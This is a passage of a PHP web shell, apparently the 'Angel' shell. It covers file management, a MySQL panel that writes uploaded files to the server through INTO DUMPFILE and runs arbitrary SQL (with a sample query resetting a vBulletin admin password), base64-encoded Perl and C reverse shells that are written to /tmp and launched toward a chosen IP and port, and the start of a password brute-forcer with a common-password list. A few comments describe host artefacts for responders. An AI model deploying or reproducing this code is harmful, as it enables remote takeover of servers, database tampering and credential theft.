786 }
787 }
788 }
789 p('<tr bgcolor="green" stlye="border-top:1px solid gray;border-bottom:1px solid gray;"><td colspan="6" height="5"></td></tr>');
790 p('<form id="filelist" name="filelist" action="' . $self . '" method="post">');
791 makehide('action', 'file');
792 makehide('thefile');
793 makehide('doing');
794 makehide('dir', $nowpath);
795 $file_i = '0';
796 foreach ($filedata as $key => $filedb) {
797 if ($filedb['filename'] != '..' && $filedb['filename'] != '.') {
798 $fileurl = str_replace(SA_ROOT, '', $filedb['server_link']);
799 $thisbg = bg();
800 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
801 p('<td width="2%" nowrap><input type="checkbox" value="1" name="dl[' . $filedb['server_link'] . ']"></td>');
802 p('<td><a href="' . $fileurl . '" target="_blank">' . $filedb['filename'] . '</a></td>');
803 p('<td nowrap>' . $filedb['mtime'] . '</td>');
804 p('<td nowrap>' . $filedb['size'] . '</td>');
805 p('<td nowrap>');
806 p('<a href="javascript:fileperm(\'' . $filedb['server_link'] . '\');">' . $filedb['filechmod'] . '</a> / ');
807 p('<a href="javascript:fileperm(\'' . $filedb['server_link'] . '\');">' . $filedb['fileperm'] . '</a>' . $filedb['fileowner'] . '</td>');
808 p('<td nowrap>');
809 p('<a href="javascript:dofile(\'downfile\',\'' . $filedb['server_link'] . '\');">Down</a> | ');
810 p('<a href="javascript:copyfile(\'' . $filedb['server_link'] . '\');">Copy</a> | ');
811 p('<a href="javascript:opfile(\'editfile\',\'' . $filedb['server_link'] . '\',\'' . $filedb['dirlink'] . '\');">Edit</a> | ');
812 p('<a href="javascript:rename(\'' . $filedb['server_link'] . '\');">Rename</a> | ');
813 p('<a href="javascript:opfile(\'newtime\',\'' . $filedb['server_link'] . '\',\'' . $filedb['dirlink'] . '\');">Time</a>');
814 p('</td></tr>');
815 $file_i++;
816 }
817 }
818 p('<tr class="fout1"><td align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td><td><a href="javascript:dofile(\'downrar\');">Download selected</a> - <a href="javascript:dofile(\'delfiles\');">Delete selected</a></td><td colspan="4" align="right">' . $dir_i . ' directories / ' . $file_i . ' files</td></tr>');
819 p('</form></table>');
820} elseif ($action == 'sqlfile') {
821 if ($doing == "mysqlupload") {
822 $file = $_FILES['uploadfile'];
823 $filename = $file['tmp_name'];
824 if (file_exists($savepath)) {
825 m('The goal file has already existed');
826 } else {
827 if (!$filename) {
828 m('Please choose a file');
829 } else {
830 $fp = @fopen($filename, 'r');
831 $contents = @fread($fp, filesize($filename));
832 @fclose($fp);
833 $contents = bin2hex($contents);
834 if (!$upname) $upname = $file['name'];
835 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
836 $result = q("SELECT 0x{$contents} FROM mysql.user INTO DUMPFILE '$savepath';");
837 m($result ? 'Upload success' : 'Upload has failed: ' . mysql_error());
838 }
839 }
840 }
841?>
842
843<script type="text/javascript">
844
// Copies the database connection fields (host, port, user, password, name, charset) from the
// "dbinfo" form into the "mysqlfile" form, stores the requested verb in the element with id
// "doing", and submits. The database password is posted in the request body along with the rest.
// NOTE(review): $('doing') relies on makehide('doing') emitting an element with that id (confirm).
845function mysqlfile(doing){
846
847 if(!doing) return;
848
849 $('doing').value=doing;
850
851 $('mysqlfile').dbhost.value=$('dbinfo').dbhost.value;
852
853 $('mysqlfile').dbport.value=$('dbinfo').dbport.value;
854
855 $('mysqlfile').dbuser.value=$('dbinfo').dbuser.value;
856
857 $('mysqlfile').dbpass.value=$('dbinfo').dbpass.value;
858
859 $('mysqlfile').dbname.value=$('dbinfo').dbname.value;
860
861 $('mysqlfile').charset.value=$('dbinfo').charset.value;
862
863 $('mysqlfile').submit();
864
865}
866
867</script>
868
869<?php
870 !$dbhost && $dbhost = 'localhost';
871 !$dbuser && $dbuser = 'root';
872 !$dbport && $dbport = '3306';
873 $charsets = array('' => 'Default', 'gbk' => 'GBK', 'big5' => 'Big5', 'utf8' => 'UTF-8', 'latin1' => 'Latin1');
874 formhead(array('title' => 'MYSQL Information', 'name' => 'dbinfo'));
875 makehide('action', 'sqlfile');
876 p('<p>');
877 p('DBHost:');
878 makeinput(array('name' => 'dbhost', 'size' => 20, 'value' => $dbhost));
879 p(':');
880 makeinput(array('name' => 'dbport', 'size' => 4, 'value' => $dbport));
881 p('DBUser:');
882 makeinput(array('name' => 'dbuser', 'size' => 15, 'value' => $dbuser));
883 p('DBPass:');
884 makeinput(array('name' => 'dbpass', 'size' => 15, 'value' => $dbpass));
885 p('DBName:');
886 makeinput(array('name' => 'dbname', 'size' => 15, 'value' => $dbname));
887 p('DBCharset:');
888 makeselect(array('name' => 'charset', 'option' => $charsets, 'selected' => $charset));
889 p('</p>');
890 formfoot();
891 p('<form action="' . $self . '" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
892 p('<h2>Upload file</h2>');
893 p('<p><b>This operation the DB user must has FILE privilege</b></p>');
894 p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
895 p('<h2>Download file</h2>');
896 p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
897 makehide('dbhost');
898 makehide('dbport');
899 makehide('dbuser');
900 makehide('dbpass');
901 makehide('dbname');
902 makehide('charset');
903 makehide('doing');
904 makehide('action', 'sqlfile');
905 p('</form>');
906} elseif ($action == 'sqladmin') {
907 !$dbhost && $dbhost = 'localhost';
908 !$dbuser && $dbuser = 'root';
909 !$dbport && $dbport = '3306';
910 $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
911 if (isset($dbhost)) {
912 $dbform.= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
913 }
914 if (isset($dbuser)) {
915 $dbform.= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
916 }
917 if (isset($dbpass)) {
918 $dbform.= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
919 }
920 if (isset($dbport)) {
921 $dbform.= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
922 }
923 if (isset($dbname)) {
924 $dbform.= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
925 }
926 if (isset($charset)) {
927 $dbform.= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
928 }
929 if ($doing == 'backupmysql' && $saveasfile) {
930 if (!$table) {
931 m('Please choose the table');
932 } else {
933 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
934 $table = array_flip($table);
935 $fp = @fopen($path, 'w');
936 if ($fp) {
937 $result = q('SHOW tables');
938 if (!$result) p('<h2>' . mysql_error() . '</h2>');
939 $mysqldata = '';
940 while ($currow = mysql_fetch_array($result)) {
941 if (isset($table[$currow[0]])) {
942 sqldumptable($currow[0], $fp);
943 }
944 }
945 fclose($fp);
946 $fileurl = str_replace(SA_ROOT, '', $path);
947 m('Database has success backup to <a href="' . $fileurl . '" target="_blank">' . $path . '</a>');
948 mysql_close();
949 } else {
950 m('Backup failed');
951 }
952 }
953 }
954 if ($insert && $insertsql) {
955 $keystr = $valstr = $tmp = '';
956 foreach ($insertsql as $key => $val) {
957 if ($val) {
958 $keystr.= $tmp . $key;
959 $valstr.= $tmp . "'" . addslashes($val) . "'";
960 $tmp = ',';
961 }
962 }
963 if ($keystr && $valstr) {
964 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
965 m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
966 }
967 }
968 if ($update && $insertsql && $base64) {
969 $valstr = $tmp = '';
970 foreach ($insertsql as $key => $val) {
971 $valstr.= $tmp . $key . "='" . addslashes($val) . "'";
972 $tmp = ',';
973 }
974 if ($valstr) {
975 $where = base64_decode($base64);
976 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
977 m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
978 }
979 }
980 if ($doing == 'del' && $base64) {
981 $where = base64_decode($base64);
982 $delete_sql = "DELETE FROM $tablename WHERE $where";
983 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
984 m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
985 }
986 if ($tablename && $doing == 'drop') {
987 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
988 if (q("DROP TABLE $tablename")) {
989 m('Drop table of success');
990 $tablename = '';
991 } else {
992 m(mysql_error());
993 }
994 }
995 $charsets = array('' => 'Default', 'gbk' => 'GBK', 'big5' => 'Big5', 'utf8' => 'UTF-8', 'latin1' => 'Latin1');
996 formhead(array('title' => 'MYSQL Manager'));
997 makehide('action', 'sqladmin');
998 p('<p>');
999 p('DBHost:');
1000 makeinput(array('name' => 'dbhost', 'size' => 20, 'value' => $dbhost));
1001 p(':');
1002 makeinput(array('name' => 'dbport', 'size' => 4, 'value' => $dbport));
1003 p('DBUser:');
1004 makeinput(array('name' => 'dbuser', 'size' => 15, 'value' => $dbuser));
1005 p('DBPass:');
1006 makeinput(array('name' => 'dbpass', 'size' => 15, 'value' => $dbpass));
1007 p('DBCharset:');
1008 makeselect(array('name' => 'charset', 'option' => $charsets, 'selected' => $charset));
1009 makeinput(array('name' => 'connect', 'value' => 'Connect', 'type' => 'submit', 'class' => 'bt'));
1010 p('</p>');
1011 formfoot();
1012?>
1013
1014<script type="text/javascript">
1015
/**
 * Submit the hidden "recordlist" form to edit or delete a single row.
 *
 * action    - value for the form's "doing" field ('edit' or 'del' at the call sites).
 * base64    - row selector; the PHP side builds it as a base64-encoded WHERE clause,
 *             decodes whatever comes back and places it into the SQL statement.
 * tablename - table the row belongs to.
 *
 * $() is the page's own element-lookup helper, defined elsewhere in the file.
 */
function editrecord(action, base64, tablename){
    // A delete asks for confirmation first; declining leaves the form untouched.
    if (action == 'del' && !confirm('Is or isn\'t deletion record?')) {
        return;
    }

    var form = $('recordlist');
    form.doing.value = action;
    form.base64.value = base64;
    form.tablename.value = tablename;
    form.submit();
}
1033
/**
 * Switch the active database: copy the chosen name into the hidden
 * "setdbname" form and submit it. An empty selection does nothing.
 *
 * The same form also carries the connection fields emitted via $dbform
 * (host, user, password, port), so every switch resends them.
 */
function moddbname(dbname) {
    if (dbname) {
        var form = $('setdbname');
        form.dbname.value = dbname;
        form.submit();
    }
}
1043
/**
 * Select a table (and optionally an operation or result page) by filling the
 * hidden "settable" form and submitting it.
 *
 * tablename - required; nothing happens when it is empty.
 * doing     - optional operation name; the generated links use 'insert',
 *             'structure' and 'drop'. Left unchanged when falsy.
 * page      - optional page number for paginated listings. Left unchanged when falsy.
 */
function settable(tablename,doing,page) {
    if (!tablename) {
        return;
    }

    var form = $('settable');
    if (doing) {
        form.doing.value = doing;
    }
    if (page) {
        form.page.value = page;
    }
    form.tablename.value = tablename;
    form.submit();
}
1065
1066</script>
1067
1068<?php
1069 formhead(array('name' => 'recordlist'));
1070 makehide('doing');
1071 makehide('action', 'sqladmin');
1072 makehide('base64');
1073 makehide('tablename');
1074 p($dbform);
1075 formfoot();
1076 formhead(array('name' => 'setdbname'));
1077 makehide('action', 'sqladmin');
1078 p($dbform);
1079 if (!$dbname) {
1080 makehide('dbname');
1081 }
1082 formfoot();
1083 formhead(array('name' => 'settable'));
1084 makehide('action', 'sqladmin');
1085 p($dbform);
1086 makehide('tablename');
1087 makehide('page', $page);
1088 makehide('doing');
1089 formfoot();
1090 $cachetables = array();
1091 $pagenum = 30;
1092 $page = intval($page);
1093 if ($page) {
1094 $start_limit = ($page - 1) * $pagenum;
1095 } else {
1096 $start_limit = 0;
1097 $page = 1;
1098 }
1099 if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
1100 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
1101 $mysqlver = mysql_get_server_info();
1102 p('<p>MySQL ' . $mysqlver . ' running in ' . $dbhost . ' as ' . $dbuser . '@' . $dbhost . '</p>');
1103 $highver = $mysqlver > '4.1' ? 1 : 0;
1104 $query = q("SHOW DATABASES");
1105 $dbs = array();
1106 $dbs[] = '-- Select a database --';
1107 while ($db = mysql_fetch_array($query)) {
1108 $dbs[$db['Database']] = $db['Database'];
1109 }
1110 makeselect(array('title' => 'Please select a database:', 'name' => 'db[]', 'option' => $dbs, 'selected' => $dbname, 'onchange' => 'moddbname(this.options[this.selectedIndex].value)', 'newline' => 1));
1111 $tabledb = array();
1112 if ($dbname) {
1113 p('<p>');
1114 p('Current dababase: <a href="javascript:moddbname(\'' . $dbname . '\');">' . $dbname . '</a>');
1115 if ($tablename) {
1116 p(' | Current Table: <a href="javascript:settable(\'' . $tablename . '\');">' . $tablename . '</a> [ <a href="javascript:settable(\'' . $tablename . '\', \'insert\');">Insert</a> | <a href="javascript:settable(\'' . $tablename . '\', \'structure\');">Structure</a> | <a href="javascript:settable(\'' . $tablename . '\', \'drop\');">Drop</a> ]');
1117 }
1118 p('</p>');
1119 mysql_select_db($dbname);
1120 $getnumsql = '';
1121 $runquery = 0;
1122 if ($sql_query) {
1123 $runquery = 1;
1124 }
1125 $allowedit = 0;
1126 if ($tablename && !$sql_query) {
1127 $sql_query = "SELECT * FROM $tablename";
1128 $getnumsql = $sql_query;
1129 $sql_query = $sql_query . " LIMIT $start_limit, $pagenum";
1130 $allowedit = 1;
1131 }
1132 p('<form action="' . $self . '" method="POST">');
1133 p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database <font color=red><b>' . $dbname . '</font></b>:<BR>Example VBB Password: <font color=red>vbateam</font><BR><font color=yellow>UPDATE `user` SET `password` = \'69e53e5ab9536e55d31ff533aefc4fbe\', salt = \'p5T\' WHERE `userid` = \'1\' </font>
1134
1135 </td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">' . htmlspecialchars($sql_query, ENT_QUOTES) . '</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
1136 makehide('tablename', $tablename);
1137 makehide('action', 'sqladmin');
1138 p($dbform);
1139 p('</form>');
1140 if ($tablename || ($runquery && $sql_query)) {
1141 if ($doing == 'structure') {
1142 $result = q("SHOW COLUMNS FROM $tablename");
1143 $rowdb = array();
1144 while ($row = mysql_fetch_array($result)) {
1145 $rowdb[] = $row;
1146 }
1147 p('<table border="0" cellpadding="3" cellspacing="0">');
1148 p('<tr class="head">');
1149 p('<td>Field</td>');
1150 p('<td>Type</td>');
1151 p('<td>Null</td>');
1152 p('<td>Key</td>');
1153 p('<td>Default</td>');
1154 p('<td>Extra</td>');
1155 p('</tr>');
1156 foreach ($rowdb as $row) {
1157 $thisbg = bg();
1158 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1159 p('<td>' . $row['Field'] . '</td>');
1160 p('<td>' . $row['Type'] . '</td>');
1161 p('<td>' . $row['Null'] . ' </td>');
1162 p('<td>' . $row['Key'] . ' </td>');
1163 p('<td>' . $row['Default'] . ' </td>');
1164 p('<td>' . $row['Extra'] . ' </td>');
1165 p('</tr>');
1166 }
1167 tbfoot();
1168 } elseif ($doing == 'insert' || $doing == 'edit') {
1169 $result = q('SHOW COLUMNS FROM ' . $tablename);
1170 while ($row = mysql_fetch_array($result)) {
1171 $rowdb[] = $row;
1172 }
1173 $rs = array();
1174 if ($doing == 'insert') {
1175 p('<h2>Insert new line in ' . $tablename . ' table »</h2>');
1176 } else {
1177 p('<h2>Update record in ' . $tablename . ' table »</h2>');
1178 $where = base64_decode($base64);
1179 $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
1180 $rs = mysql_fetch_array($result);
1181 }
1182 p('<form method="post" action="' . $self . '">');
1183 p($dbform);
1184 makehide('action', 'sqladmin');
1185 makehide('tablename', $tablename);
1186 p('<table border="0" cellpadding="3" cellspacing="0">');
1187 foreach ($rowdb as $row) {
1188 if ($rs[$row['Field']]) {
1189 $value = htmlspecialchars($rs[$row['Field']]);
1190 } else {
1191 $value = '';
1192 }
1193 $thisbg = bg();
1194 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1195 p('<td><b>' . $row['Field'] . '</b><br />' . $row['Type'] . '</td><td><textarea class="area" name="insertsql[' . $row['Field'] . ']" style="width:500px;height:60px;overflow:auto;">' . $value . '</textarea></td></tr>');
1196 }
1197 if ($doing == 'insert') {
1198 p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
1199 } else {
1200 p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
1201 makehide('base64', $base64);
1202 }
1203 p('</table></form>');
1204 } else {
1205 $querys = @explode(';', $sql_query);
1206 foreach ($querys as $num => $query) {
1207 if ($query) {
1208 p("<p><b>Query#{$num} : " . htmlspecialchars($query, ENT_QUOTES) . "</b></p>");
1209 switch (qy($query)) {
1210 case 0:
1211 p('<h2>Error : ' . mysql_error() . '</h2>');
1212 break;
1213 case 1:
1214 if (strtolower(substr($query, 0, 13)) == 'select * from') {
1215 $allowedit = 1;
1216 }
1217 if ($getnumsql) {
1218 $tatol = mysql_num_rows(q($getnumsql));
1219 $multipage = multi($tatol, $pagenum, $page, $tablename);
1220 }
1221 if (!$tablename) {
1222 $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
1223 $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
1224 preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i", $sql_line, $matches);
1225 $tablename = $matches[1][0];
1226 }
1227 $result = q($query);
1228 p($multipage);
1229 p('<table border="0" cellpadding="3" cellspacing="0">');
1230 p('<tr class="head">');
1231 if ($allowedit) p('<td>Action</td>');
1232 $fieldnum = @mysql_num_fields($result);
1233 for ($i = 0;$i < $fieldnum;$i++) {
1234 $name = @mysql_field_name($result, $i);
1235 $type = @mysql_field_type($result, $i);
1236 $len = @mysql_field_len($result, $i);
1237 p("<td nowrap>$name<br><span>$type($len)</span></td>");
1238 }
1239 p('</tr>');
1240 while ($mn = @mysql_fetch_assoc($result)) {
1241 $thisbg = bg();
1242 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1243 $where = $tmp = $b1 = '';
1244 foreach ($mn as $key => $inside) {
1245 if ($inside) {
1246 $where.= $tmp . $key . "='" . addslashes($inside) . "'";
1247 $tmp = ' AND ';
1248 }
1249 $b1.= '<td nowrap>' . html_clean($inside) . ' </td>';
1250 }
1251 $where = base64_encode($where);
1252 if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \'' . $where . '\', \'' . $tablename . '\');">Edit</a> | <a href="javascript:editrecord(\'del\', \'' . $where . '\', \'' . $tablename . '\');">Del</a></td>');
1253 p($b1);
1254 p('</tr>');
1255 unset($b1);
1256 }
1257 tbfoot();
1258 p($multipage);
1259 break;
1260 case 2:
1261 $ar = mysql_affected_rows();
1262 p('<h2>affected rows : <b>' . $ar . '</b></h2>');
1263 break;
1264 }
1265 }
1266 }
1267 }
1268 } else {
1269 $query = q("SHOW TABLE STATUS");
1270 $table_num = $table_rows = $data_size = 0;
1271 $tabledb = array();
1272 while ($table = mysql_fetch_array($query)) {
1273 $data_size = $data_size + $table['Data_length'];
1274 $table_rows = $table_rows + $table['Rows'];
1275 $table['Data_length'] = sizecount($table['Data_length']);
1276 $table_num++;
1277 $tabledb[] = $table;
1278 }
1279 $data_size = sizecount($data_size);
1280 unset($table);
1281 p('<table border="0" cellpadding="0" cellspacing="0">');
1282 p('<form action="' . $self . '" method="POST">');
1283 makehide('action', 'sqladmin');
1284 p($dbform);
1285 p('<tr class="head">');
1286 p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
1287 p('<td>Name</td>');
1288 p('<td>Rows</td>');
1289 p('<td>Data_length</td>');
1290 p('<td>Create_time</td>');
1291 p('<td>Update_time</td>');
1292 if ($highver) {
1293 p('<td>Engine</td>');
1294 p('<td>Collation</td>');
1295 }
1296 p('</tr>');
1297 foreach ($tabledb as $key => $table) {
1298 $thisbg = bg();
1299 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1300 p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="' . $table['Name'] . '" /></td>');
1301 p('<td><a href="javascript:settable(\'' . $table['Name'] . '\');">' . $table['Name'] . '</a> [ <a href="javascript:settable(\'' . $table['Name'] . '\', \'insert\');">Insert</a> | <a href="javascript:settable(\'' . $table['Name'] . '\', \'structure\');">Structure</a> | <a href="javascript:settable(\'' . $table['Name'] . '\', \'drop\');">Drop</a> ]</td>');
1302 p('<td>' . $table['Rows'] . '</td>');
1303 p('<td>' . $table['Data_length'] . '</td>');
1304 p('<td>' . $table['Create_time'] . '</td>');
1305 p('<td>' . $table['Update_time'] . '</td>');
1306 if ($highver) {
1307 p('<td>' . $table['Engine'] . '</td>');
1308 p('<td>' . $table['Collation'] . '</td>');
1309 }
1310 p('</tr>');
1311 }
1312 p('<tr class=fout>');
1313 p('<td> </td>');
1314 p('<td>Total tables: ' . $table_num . '</td>');
1315 p('<td>' . $table_rows . '</td>');
1316 p('<td>' . $data_size . '</td>');
1317 p('<td colspan="' . ($highver ? 4 : 2) . '"> </td>');
1318 p('</tr>');
1319 p("<tr class=\"fout\"><td colspan=\"" . ($highver ? 8 : 6) . "\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"" . SA_ROOT . $_SERVER['HTTP_HOST'] . "sql.gz\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
1320 makehide('doing', 'backupmysql');
1321 formfoot();
1322 p("</table>");
1323 fr($query);
1324 }
1325 }
1326 }
1327 tbfoot();
1328 @mysql_close();
1329} elseif ($action == 'backconnect') {
1330 !$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
1331 !$yourport && $yourport = '12345';
1332 $usedb = array('perl' => 'perl', 'c' => 'c');
1333 $back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1334 $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
// Back-connect launcher: runs only when start, yourip, yourport and use are all set.
// Either branch writes a file under /tmp and starts it in the background ("&") with
// the supplied address and port as arguments. cf(), which() and execute() are helpers
// defined elsewhere in the file (presumably write-file, locate-binary and run-command;
// confirm against their definitions).
// Host artefacts for responders: /tmp/angel_bc, a short-lived /tmp/angel_bc.c, perl or
// gcc started by the web-server account, and an outbound TCP connection from that account.
1335 if ($start && $yourip && $yourport && $use) {
1336 if ($use == 'perl') {
// Perl variant: the script body comes from $back_connect defined just above.
1337 cf('/tmp/angel_bc', $back_connect);
1338 $res = execute(which('perl') . " /tmp/angel_bc $yourip $yourport &");
1339 } else {
// C variant: source is written, compiled with gcc, and only the .c file is unlinked here.
// NOTE(review): the embedded C source appears to remove its own binary once started, so
// /tmp/angel_bc may be absent afterwards; process and network telemetry are the more
// reliable evidence.
1340 cf('/tmp/angel_bc.c', $back_connect_c);
1341 $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
1342 @unlink('/tmp/angel_bc.c');
1343 $res = execute("/tmp/angel_bc $yourip $yourport &");
1344 }
// The banner is printed whether or not the launch worked; $res is never inspected.
1345 m("Now script try connect to $yourip port $yourport ...");
1346 }
1347 formhead(array('title' => 'Back Connect'));
1348 makehide('action', 'backconnect');
1349 p('<p>');
1350 p('Your IP:');
1351 makeinput(array('name' => 'yourip', 'size' => 20, 'value' => $yourip));
1352 p('Your Port:');
1353 makeinput(array('name' => 'yourport', 'size' => 15, 'value' => $yourport));
1354 p('Use:');
1355 makeselect(array('name' => 'use', 'option' => $usedb, 'selected' => $use));
1356 makeinput(array('name' => 'start', 'value' => 'Start', 'type' => 'submit', 'class' => 'bt'));
1357 p('</p>');
1358 formfoot();
1359} elseif ($action == 'brute') {
1360 formhead(array('title' => 'Brute Forcer'));
1361 makehide('action', 'brute');
1362 makehide('dir', $brute);
1363 @ini_set('memory_limit', 1000000000000);
1364 $connect_timeout = 5;
1365 @set_time_limit(0);
1366 $submit = $_REQUEST['submit'];
1367 $users = $_REQUEST['users'];
1368 $pass = $_REQUEST['passwords'];
1369 $target = $_REQUEST['target'];
1370 $option = $_REQUEST['option'];
1371 $passlist = "123pass
1372
1373123!@#
1374
1375123admin
1376
1377123abc
1378
1379123456admin
1380
13811234554321
1382
138312344321
1384
1385pass123
1386
1387admin
1388
1389admincp
1390
1391administrator
1392
1393matkhau
1394
1395passadmin
1396
1397p@ssword
1398
1399password
1400
1401012345
1402
1403123456
1404
14051234567
1406
140712345678
1408
1409123456789
1410
14111234567890
1412
1413111111
1414
1415000000
1416
1417222222
1418
1419333333
1420
1421444444
1422
1423555555
1424
1425666666
1426
1427777777
1428
1429888888
1430
1431999999
1432
1433123123
1434
1435234234
1436
1437345345
1438
1439456456
1440
1441567567
1442
1443678678
1444
1445789789
1446
1447123321
1448
1449456654
1450
1451654321
1452
14537654321
1454
145587654321
1456
1457987654321
1458
14590987654321
1460
1461admin123
1462
1463admin123456
1464
1465abcdef
1466
1467abcabc
1468
1469!@#!@#
1470
1471!@#$%^
1472
1473!@#$%^&*(
1474
1475!@#$$#@!
1476
1477abc123
1478
1479anhyeuem
1480
1481iloveyou
1482
1483admin
1484
1485administrator
1486
1487admincp
1488
1489cpanel
1490
1491adminx
1492
1493admins
1494
1495password
1496
1497passwords
1498
1499passw0rd
1500
1501p@ssw0rd
1502
1503p@ssword
1504
1505khongco
1506
150725251325
1508
1509passw0rds";
1510 if ($target == '') {
1511 $target = 'localhost';
1512 }
1513 print " <div align='center'>
1514
1515<form method='post' style='border: 1px solid #000000'><br><br>
1516
1517<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#966117 border=1><tr><td>
1518
1519<b> Target : </font><input type='text' name='target' size='16' value= $target style='border: font-family:tahoma; font-weight:bold;'></p></font></b></p>
1520
1521<div align='center'><br>
1522
